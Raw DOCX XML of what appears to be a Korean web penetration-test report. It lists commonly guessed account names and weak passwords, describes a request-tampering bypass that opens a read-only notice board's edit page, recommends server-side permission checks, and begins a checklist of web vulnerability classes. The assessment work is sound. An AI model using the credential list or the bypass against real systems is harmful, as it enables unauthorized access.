          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="535" w:name="_Toc48909101"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="535"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="0032445D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값의 적절성 및 복잡성을 검증하는 체크 로직이 구현되어야 함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032445D" w:rsidRDefault="0032445D" w:rsidP="00FA3A45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계정 및 패스워드의 체크 로직 추가 구현</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032445D" w:rsidRDefault="0032445D" w:rsidP="00FA3A45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취약한 계정 및 패스워드 </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="850" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4109"/>
        <w:gridCol w:w="4057"/>
      </w:tblGrid>
      <w:tr w:rsidR="0032445D" w:rsidTr="0032445D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="0032445D" w:rsidRP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계 정</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="0032445D" w:rsidRP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패스워드</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0032445D" w:rsidTr="0032445D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr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A</w:t>
            </w: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min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Administrator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Manager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Guest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Test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Scott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Tomcat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Root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User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Operator</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0032445D" w:rsidRP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anonymous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr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bcd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Aaaa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1234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1111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Test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Password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Public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Blank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0000</w:t>
            </w:r>
          </w:p>
          <w:p w:rsid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q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wer</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0032445D" w:rsidRPr="0032445D" w:rsidRDefault="0032445D" w:rsidP="0032445D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D와 동일한 패스워드</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0032445D" w:rsidRPr="0070637F" w:rsidRDefault="0032445D" w:rsidP="00FA3A45">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="0032445D" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45"/>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="536" w:name="_Toc48909102"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>프로세스 검증 누락</w:t>
      </w:r>
      <w:bookmarkEnd w:id="536"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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b"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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b"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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b"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="537" w:name="_Toc48909103"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="537"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="0070637F" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 인증이 필요한 모든 중요(관리자 페이지,</w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">회원변경 페이지 등) 페이지에 재한 접근 제어가 미흡한 경우 하위 </w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>직접 접근,</w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스크립트 조작 등의 방법으로 중요한 페이지에 재한 접근이 가능함</w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="538" w:name="_Toc48909104"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="538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FA3A45" w:rsidRPr="00C97C1E" w:rsidTr="00FA3A45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A3A45" w:rsidRPr="0070637F" w:rsidRDefault="00FA3A45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취약한 매소드/경로</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5781" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00FA3A45" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="0070637F">
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidR="00753688" w:rsidRPr="00753688">
              <w:t>/jsp/community.</w:t>
            </w:r>
            <w:r w:rsidR="00753688">
              <w:t>jsp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00753688" w:rsidRDefault="00753688" w:rsidP="00FA3A45">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r>
              <w:t>* /</w:t>
            </w:r>
            <w:r w:rsidRPr="00753688">
              <w:t>jsp</w:t>
            </w:r>
            <w:r>
              <w:t>/cmnt_view.jsp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00753688" w:rsidRPr="0070637F" w:rsidRDefault="00753688" w:rsidP="00FA3A45">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r>
              <w:t>* /</w:t>
            </w:r>
            <w:r w:rsidRPr="00753688">
              <w:t>jsp</w:t>
            </w:r>
            <w:r>
              <w:t>/cmnt_modify.jsp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidTr="00FA3A45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FA3A45" w:rsidRPr="0070637F" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A4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70637F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FA3A45" w:rsidRPr="0070637F" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0070637F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="00753688">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>수정이 불가능한 공지사항 게시판을 수정 화면으로 우회 가능</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pP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 w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#1]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00753688">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>공지사항 게시판을 확인</w:t>
      </w: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194F67F4" wp14:editId="1653BABC">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="2667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46" b="44472"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860384" cy="306045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45" w:rsidRPr="0070637F" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="539" w:name="_Toc48909191"/>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림</w:t>
      </w:r>
      <w:r w:rsidR="00753688">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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39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753688">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>공지사항 게시판 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="539"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pP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t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00753688">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00753688">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>요청을 변조하여 요청 시도</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A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252F6F87" wp14:editId="27D64E7C">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="2667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8" b="49992"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860401" cy="306047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45" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="540" w:name="_Toc48909192"/>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림</w:t>
      </w:r>
      <w:r w:rsidR="00753688">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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40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 w:rsidR="00753688">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>요청 변조</w:t>
      </w:r>
      <w:bookmarkEnd w:id="540"/>
    </w:p>
    <w:p w:rsidR="00753688" w:rsidRDefault="00753688" w:rsidP="00753688"/>
    <w:p w:rsidR="00753688" w:rsidRDefault="00753688" w:rsidP="00753688"/>
    <w:p w:rsidR="00753688" w:rsidRDefault="00753688" w:rsidP="00753688"/>
    <w:p w:rsidR="00753688" w:rsidRPr="00C97C1E" w:rsidRDefault="00753688" w:rsidP="0075368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rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E"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>게시판 수정 화면으로 우회 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753688" w:rsidRPr="00C97C1E" w:rsidRDefault="00753688" w:rsidP="0075368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C97C1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2125DAAB" wp14:editId="4442A6F1">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="2667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4" b="44438"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860225" cy="306035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688" w:rsidRPr="0070637F" w:rsidRDefault="00753688" w:rsidP="00753688">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="541" w:name="_Toc48909193"/>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림_3- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>41</w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>게시판 수정 화면</w:t>
      </w:r>
      <w:bookmarkEnd w:id="541"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="542" w:name="_Toc48909105"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="542"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인증이 필요한 모든 페이지에 대해 유효 세션임을 확인하는 프로세스 및 주요 정보 페이지에 접근 요청자의 권한 검증 로직을 구현함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45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>유효 세션의 검증 및 페이지에 대한 접근 권한은 스크립트에 의존하지 말며,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Server Side Script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 구현된 프로세스를 사용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="0070637F" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45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우회될 수 있는 플로우를 차단 및 권한 매트릭스를 기준으로 전 페이지에서 권한 체크가 이루어지도록 구현함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00FA3A45" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45"/>
    <w:p w:rsidR="009E03F0" w:rsidRPr="00C97C1E" w:rsidRDefault="009E03F0" w:rsidP="00B004BB">
      <w:pPr>
        <w:pageBreakBefore/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E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[</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E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r w:rsidRPr="00C97C1E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 xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E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진단항목</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E03F0" w:rsidRPr="00FA3A45" w:rsidRDefault="005160B9" w:rsidP="00B004BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:wordWrap/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="384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A3A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="굴림" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>과학기술</w:t>
      </w:r>
      <w:r w:rsidR="00A20EE4" w:rsidRPr="00FA3A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="굴림" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>정보통신</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="굴림" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>부</w:t>
      </w:r>
      <w:r w:rsidR="009E03F0" w:rsidRPr="00FA3A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="굴림" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서</w:t>
      </w:r>
      <w:r w:rsidR="00DB3278" w:rsidRPr="00FA3A4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9E03F0" w:rsidRPr="00FA3A4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시한 </w:t>
      </w:r>
      <w:r w:rsidR="009E03F0" w:rsidRPr="00FA3A45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="009E03F0" w:rsidRPr="00FA3A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="굴림" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>주요정보통신기반시설</w:t>
      </w:r>
      <w:r w:rsidR="009E03F0" w:rsidRPr="00FA3A4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9E03F0" w:rsidRPr="00FA3A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="굴림" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidR="009E03F0" w:rsidRPr="00FA3A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="굴림"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(WEB) </w:t>
      </w:r>
      <w:r w:rsidR="009E03F0" w:rsidRPr="00FA3A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="굴림" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>취약점 분석</w:t>
      </w:r>
      <w:r w:rsidR="009E03F0" w:rsidRPr="00FA3A45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="009E03F0" w:rsidRPr="00FA3A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>평가</w:t>
      </w:r>
      <w:r w:rsidR="009E03F0" w:rsidRPr="00FA3A4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가이드라인</w:t>
      </w:r>
      <w:r w:rsidR="009E03F0" w:rsidRPr="00FA3A45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="009E03F0" w:rsidRPr="00FA3A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="굴림" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에 근거하여 통제평가 리스트를 작성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497"/>
        <w:gridCol w:w="5722"/>
        <w:gridCol w:w="985"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E03F0" w:rsidRPr="00C97C1E" w:rsidTr="00DB3278">
        <w:trPr>
          <w:trHeight w:val="45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C97C1E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C97C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C97C1E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C97C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약점명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C97C1E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C97C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 명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C97C1E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C97C1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퍼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버플로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모리나 버퍼의 블록 크기보다 더 많은 데이터를 넣음으로써 결함을 발생시키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맷스트링</w:t>
            </w:r>
          </w:p>
        </w:tc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트링을 처리하는 부분에서 메모리 공간에 접근할 수 있는 문제를 이용하는 취약점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I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DAP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LDAP(Lightweight Directory Access Protocol)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쿼리를 주입함으로서 개인정보 등의 내용이 유출될 수 있는 문제를 이용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O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체제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령실행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웹 사이트의 인터페이스를 통해 웹 서버를 운영하는 운영체제 명령을 실행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5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QL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spacing w:val="-8"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SQL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으로 해석될 수 있는 입력을 시도하여 데이터베이스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I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SSI(Server-side Include)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는 </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3A45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“</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3A45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Last modified"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와 같이 서버가 </w:t>
            </w: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HTML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입력하는 변수 값으로</w:t>
            </w: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서버 상에 있는 파일을 </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3A45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include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시키고</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3A45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,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명령문이 실행되게 하여 데이터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Path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조작된 </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3A45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XPath(XML Path Language)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쿼리를 보냄으로써 비정상적인 데이터를 쿼리해 올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D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렉터리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덱싱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Cs w:val="20"/>
              </w:rPr>
              <w:t>요청 파일이 존재하지 않을 때 자동적으로 디렉터리 리스트를 출력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누출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웹 사이트 데이터가 노출되는 것으로 개발과정의 코멘트나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오류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메시지 등에서 중요한 정보가 노출되어 공격자에게 </w:t>
            </w:r>
